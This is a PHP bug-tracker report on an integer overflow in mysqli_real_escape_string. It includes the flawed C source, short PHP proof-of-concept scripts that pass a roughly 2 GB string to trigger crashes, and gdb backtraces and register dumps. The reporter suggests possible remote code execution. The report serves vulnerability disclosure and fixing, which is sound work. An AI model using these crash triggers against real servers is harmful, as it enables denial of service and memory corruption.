php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #74544 Integer overflow in mysqli_real_escape_string()
Submitted: 2017-05-05 04:31 UTC Modified: 2017-06-20 06:21 UTC
From: whitehat002 at hotmail dot com Assigned:
Status: Open Package: MySQLi related
PHP Version: 7.1.5 OS:
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: whitehat002 at hotmail dot com
New email:
PHP Version: OS:

 

 [2017-05-05 04:31 UTC] whitehat002 at hotmail dot com
Description:
------------
PHP_FUNCTION(mysqli_real_escape_string) {
	MY_MYSQL	*mysql;
	zval		*mysql_link = NULL;
	char		*escapestr;
	size_t			escapestr_len;
	zend_string *newstr;

	if (zend_parse_method_parameters(ZEND_NUM_ARGS(), getThis(), "Os", &mysql_link, mysqli_link_class_entry, &escapestr, &escapestr_len) == FAILURE) {
		return;
	}
	MYSQLI_FETCH_RESOURCE_CONN(mysql, mysql_link, MYSQLI_STATUS_VALID);

	newstr = zend_string_alloc(2 * escapestr_len, 0);  //integer overflow
	ZSTR_LEN(newstr) = mysql_real_escape_string(mysql->mysql, ZSTR_VAL(newstr), escapestr, escapestr_len);
	newstr = zend_string_truncate(newstr, ZSTR_LEN(newstr), 0);

	RETURN_NEW_STR(newstr);
}

Test script:
---------------
<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7fffffff);
$str.="AAAAA";
$mysqli=new mysqli("localhost","root","toor","mysql");
$mysqli->real_escape_string($str);
?>


Actual result:
--------------
root@hackyzh-virtual-machine:~# gdb -q --args ./php-7.1.4/sapi/cli/php -n poc2.php
Reading symbols from /root/php-7.1.4/sapi/cli/php...done.
(gdb) b mysqli_api.c:1968
Breakpoint 1 at 0x81ddbdc: file /root/php-7.1.4/ext/mysqli/mysqli_api.c, line 1968.
(gdb) r
Starting program: /root/php-7.1.4/sapi/cli/php -n poc2.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, zif_mysqli_real_escape_string (execute_data=0xb70130f0, 
    return_value=0xbfffc100) at /root/php-7.1.4/ext/mysqli/mysqli_api.c:1968
1968		newstr = zend_string_alloc(2 * escapestr_len, 0);
(gdb) p/x escapestr_len
$1 = 0x80000004
(gdb) p/x 2*escapestr_len
$2 = 0x8


Patches

bug74544.diff (last revision 2017-07-24 10:11 UTC) by johannes at schlueters dot de)

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-05-09 08:17 UTC] whitehat002 at hotmail dot com
In php-7.0.1,I take this script ot test.Then,it crash.In others,it does not.I do not know why the same code will have different results.
_____________________________________________________________________

<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7ffffff0);
$mysqli=new mysqli("localhost","root","toor","mysql");
$mysqli->real_escape_string($str);
?>
_____________________________________________________________________

hackyzh@ubuntu:~/Downloads$ gdb -q --args ./php-7.0.1/sapi/cli/php -n ../Desktop/poc.php
Reading symbols from /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php...done.
(gdb) r
Starting program: /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php -n ../Desktop/poc.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Warning: String is not zero-terminated (@��) (source: /home/hackyzh/Downloads/php-7.0.1/Zend/zend_vm_execute.h:858) in /home/hackyzh/Desktop/poc.php on line 6
[Tue May  9 16:11:53 2017]  Script:  '/home/hackyzh/Desktop/poc.php'

Program received signal SIGSEGV, Segmentation fault.
0x08474ed6 in format_converter (odp=0xbfffc974, 
    fmt=0x8b365a5 "s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9e0 "") at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:993
993							s_len = strlen(s);
(gdb) bt
#0  0x08474ed6 in format_converter (odp=0xbfffc974, 
    fmt=0x8b365a5 "s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9e0 "") at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:993
#1  0x08475719 in strx_printv (ccp=0xbfffc9b8, 
    buf=0xbfffda4c "Tue May  9 16:11:53 2017", len=512, 
    format=0x8b365a4 "%s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9dc "\377\377\377\377")
    at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:1248
#2  0x08475817 in ap_php_snprintf (buf=0xbfffda4c "Tue May  9 16:11:53 2017", 
    len=512, 
    format=0x8b365a4 "%s(%d) : Actual location (location was relayed)\n")
    at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:1293
#3  0x08471625 in php_message_handler_for_zend (message=4, data=0xbfffdcbc)
    at /home/hackyzh/Downloads/php-7.0.1/main/main.c:1435
#4  0x084eca9e in zend_message_dispatcher (message=4, data=0xbfffdcbc)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend.c:999
#5  0x084c1af9 in zend_mm_check_leaks (heap=0xb7000040)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2121
#6  0x084c1d99 in zend_mm_shutdown (heap=0xb7000040, full=0, silent=0)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2193
#7  0x084c2acf in shutdown_memory_manager (silent=0, full_shutdown=0)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2629
#8  0x0847204d in php_request_shutdown (dummy=0x0)
---Type <return> to continue, or q <return> to quit---
    at /home/hackyzh/Downloads/php-7.0.1/main/main.c:1833
#9  0x08598c13 in do_cli (argc=3, argv=0x8c1cd30)
    at /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php_cli.c:1142
#10 0x0859942a in main (argc=3, argv=0x8c1cd30)
    at /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php_cli.c:1345
 [2017-05-11 09:17 UTC] whitehat002 at hotmail dot com
I found a way to make it crash.It seems to be able to execute remote code.
<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7fffffff);
$str.="AA";
$mysqli=new mysqli("localhost","root","toor","mysql");
$v=$mysqli->real_escape_string($str); 
$mysqli->query($v);           
?>
_______________________________________________________
Program received signal SIGSEGV, Segmentation fault.
0xb7a63976 in ?? () from /lib/i386-linux-gnu/libc.so.6
(gdb) bt
#0  0xb7a63976 in ?? () from /lib/i386-linux-gnu/libc.so.6
#1  0x08349eaf in php_mysqlnd_cmd_write (_packet=0xb7068038)
    at /usr/include/i386-linux-gnu/bits/string3.h:52
#2  0x08349a4b in mysqlnd_mysqlnd_protocol_send_command_pub (
    payload_decoder_factory=0xb706f000, command=COM_QUERY, arg=0xb7002080 "\220 ", 
    arg_len=4294967295, silent=0 '\000', connection_state=0xb706663c, 
    error_info=0xb7066424, upsert_status=0xb70663fc, stats=0xb7002050, 
    send_close=0x83422a0 <mysqlnd_mysqlnd_conn_data_send_close_pub>, 
    send_close_ctx=0xb7066380)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_wireprotocol.c:2772
#3  0x08358e6c in mysqlnd_com_query_run (cmd=0xb70543d8)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_commands.c:644
#4  0x08342040 in mysqlnd_mysqlnd_conn_data_send_query_pub (conn=0xb7066380, 
    query=0xb7002080 "\220 ", query_len=4294967295, type=MYSQLND_SEND_QUERY_IMPLICIT, 
    read_cb=0x0, err_cb=0x0) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:889
#5  0x08344a04 in mysqlnd_mysqlnd_conn_data_query_pub (query_len=4294967295, 
    query=0xb7002080 "\220 ", conn=0xb7066380)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:858
#6  mysqlnd_mysqlnd_conn_data_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", 
    query_len=4294967295) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:850
#7  0x081e391a in zif_mysqli_query (execute_data=0xb7013120, return_value=0xbfffc100)
    at /root/php-7.1.4/ext/mysqli/mysqli_nonapi.c:593
#8  0x084558e3 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (execute_data=0xb7013020)
---Type <return> to continue, or q <return> to quit---
    at /root/php-7.1.4/Zend/zend_vm_execute.h:970
#9  0x084093be in execute_ex (ex=0xb7013020)
    at /root/php-7.1.4/Zend/zend_vm_execute.h:432
#10 0x0845770f in zend_execute (op_array=0xb7069180, return_value=0x0)
    at /root/php-7.1.4/Zend/zend_vm_execute.h:474
#11 0x083c15c0 in zend_execute_scripts (type=8, retval=0x0, file_count=3)
    at /root/php-7.1.4/Zend/zend.c:1476
#12 0x08362a0d in php_execute_script (primary_file=0xbfffe464)
    at /root/php-7.1.4/main/main.c:2537
#13 0x08459824 in do_cli (argc=3, argv=0x8a8d868)
    at /root/php-7.1.4/sapi/cli/php_cli.c:993
#14 0x080785ad in main (argc=3, argv=0x8a8d868)
    at /root/php-7.1.4/sapi/cli/php_cli.c:1381
 [2017-05-12 02:08 UTC] whitehat002 at hotmail dot com
-PHP Version: 7.1.4 +PHP Version: 7.1.5
 [2017-05-12 02:08 UTC] whitehat002 at hotmail dot com
In new php version,it also has the same bug.
 [2017-05-15 09:44 UTC] whitehat002 at hotmail dot com
Has anyone solved it?
 [2017-05-17 08:14 UTC] whitehat002 at hotmail dot com
gdb-peda$ r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0xb719409b --> 0x0 
EBX: 0xb7ab0000 --> 0x1abda8 
ECX: 0xffe6df64 
EDX: 0xb71fffa0 --> 0x0 
ESI: 0xb7002050 --> 0xb7061600 --> 0x5e ('^')
EDI: 0xb70600f0 --> 0xb706e000 --> 0x2000000 
EBP: 0x57f7 
ESP: 0xbfffbef8 --> 0xffffffff 
EIP: 0xb7a3a666 (<__memcpy_ssse3_rep+3510>:	movntdq XMMWORD PTR [edx+0x60],xmm6)
EFLAGS: 0x210282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xb7a3a657 <__memcpy_ssse3_rep+3495>:	movntdq XMMWORD PTR [edx+0x30],xmm3
   0xb7a3a65c <__memcpy_ssse3_rep+3500>:	movntdq XMMWORD PTR [edx+0x40],xmm4
   0xb7a3a661 <__memcpy_ssse3_rep+3505>:	movntdq XMMWORD PTR [edx+0x50],xmm5
=> 0xb7a3a666 <__memcpy_ssse3_rep+3510>:	movntdq XMMWORD PTR [edx+0x60],xmm6
   0xb7a3a66b <__memcpy_ssse3_rep+3515>:	movntdq XMMWORD PTR [edx+0x70],xmm7
   0xb7a3a670 <__memcpy_ssse3_rep+3520>:	lea    edx,[edx+0x80]
   0xb7a3a676 <__memcpy_ssse3_rep+3526>:	
    jae    0xb7a3a605 <__memcpy_ssse3_rep+3413>
   0xb7a3a678 <__memcpy_ssse3_rep+3528>:	add    ecx,0x80
[------------------------------------stack-------------------------------------]
0000| 0xbfffbef8 --> 0xffffffff 
0004| 0xbfffbefc --> 0x834a14f (<php_mysqlnd_cmd_write+543>:	mov    edx,DWORD PTR [esp+0x2c])
0008| 0xbfffbf00 --> 0xb706e005 --> 0xb7002090 --> 0xb70020a0 --> 0xb70020b0 --> 0xb70020c0 (--> ...)
0012| 0xbfffbf04 --> 0xb7002080 --> 0xb7002090 --> 0xb70020a0 --> 0xb70020b0 --> 0xb70020c0 (--> ...)
0016| 0xbfffbf08 --> 0xffffffff 
0020| 0xbfffbf0c --> 0x8348267 (<_mysqlnd_pecalloc+151>:	jmp    0x8348211 <_mysqlnd_pecalloc+65>)
0024| 0xbfffbf10 --> 0x4 
0028| 0xbfffbf14 --> 0xb7054478 ("toor")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
__memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1300
1300	../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S: No such file or directory.
gdb-peda$ bt
#0  __memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1300
#1  0x0834a14f in php_mysqlnd_cmd_write (_packet=0xb7068038)
    at /usr/include/i386-linux-gnu/bits/string3.h:52
#2  0x08349ceb in mysqlnd_mysqlnd_protocol_send_command_pub (
    payload_decoder_factory=0xb706f000, command=COM_QUERY, arg=0xb7002080 "\220 ", 
    arg_len=0xffffffff, silent=0x0, connection_state=0xb706663c, 
    error_info=0xb7066424, upsert_status=0xb70663fc, stats=0xb7002050, 
    send_close=0x8342540 <mysqlnd_mysqlnd_conn_data_send_close_pub>, 
    send_close_ctx=0xb7066380)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_wireprotocol.c:2772
#3  0x0835910c in mysqlnd_com_query_run (cmd=0xb70544b0)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_commands.c:644
#4  0x083422e0 in mysqlnd_mysqlnd_conn_data_send_query_pub (conn=0xb7066380, 
    query=0xb7002080 "\220 ", query_len=0xffffffff, type=MYSQLND_SEND_QUERY_IMPLICIT, 
    read_cb=0x0, err_cb=0x0) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:889
#5  0x08344ca4 in mysqlnd_mysqlnd_conn_data_query_pub (query_len=0xffffffff, 
    query=0xb7002080 "\220 ", conn=0xb7066380)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:858
#6  mysqlnd_mysqlnd_conn_data_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", 
    query_len=0xffffffff) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:850
#7  0x081e3b1a in zif_mysqli_query (execute_data=0xb7013120, return_value=0xbfffc100)
    at /root/php-7.1.5/ext/mysqli/mysqli_nonapi.c:593
#8  0x08455c93 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (execute_data=0xb7013020)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:970
#9  0x0840969e in execute_ex (ex=0xb7013020)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:432
#10 0x08457abf in zend_execute (op_array=0xb7069180, return_value=0x0)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:474
#11 0x083c1890 in zend_execute_scripts (type=0x8, retval=0x0, file_count=0x3)
    at /root/php-7.1.5/Zend/zend.c:1476
#12 0x08362cad in php_execute_script (primary_file=0xbfffe464)
    at /root/php-7.1.5/main/main.c:2537
#13 0x08459bd4 in do_cli (argc=0x3, argv=0x8a8e868)
    at /root/php-7.1.5/sapi/cli/php_cli.c:993
#14 0x080785ad in main (argc=0x3, argv=0x8a8e868)
    at /root/php-7.1.5/sapi/cli/php_cli.c:1381
#15 0xb791daf3 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#16 0x08078641 in _start ()
——————————————————————————————————————————————————————
It seems to lead to buffer overflow.
 [2017-06-20 06:21 UTC] stas@php.net
-Type: Security +Type: Bug
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sat Nov 18 15:03:12 2017 UTC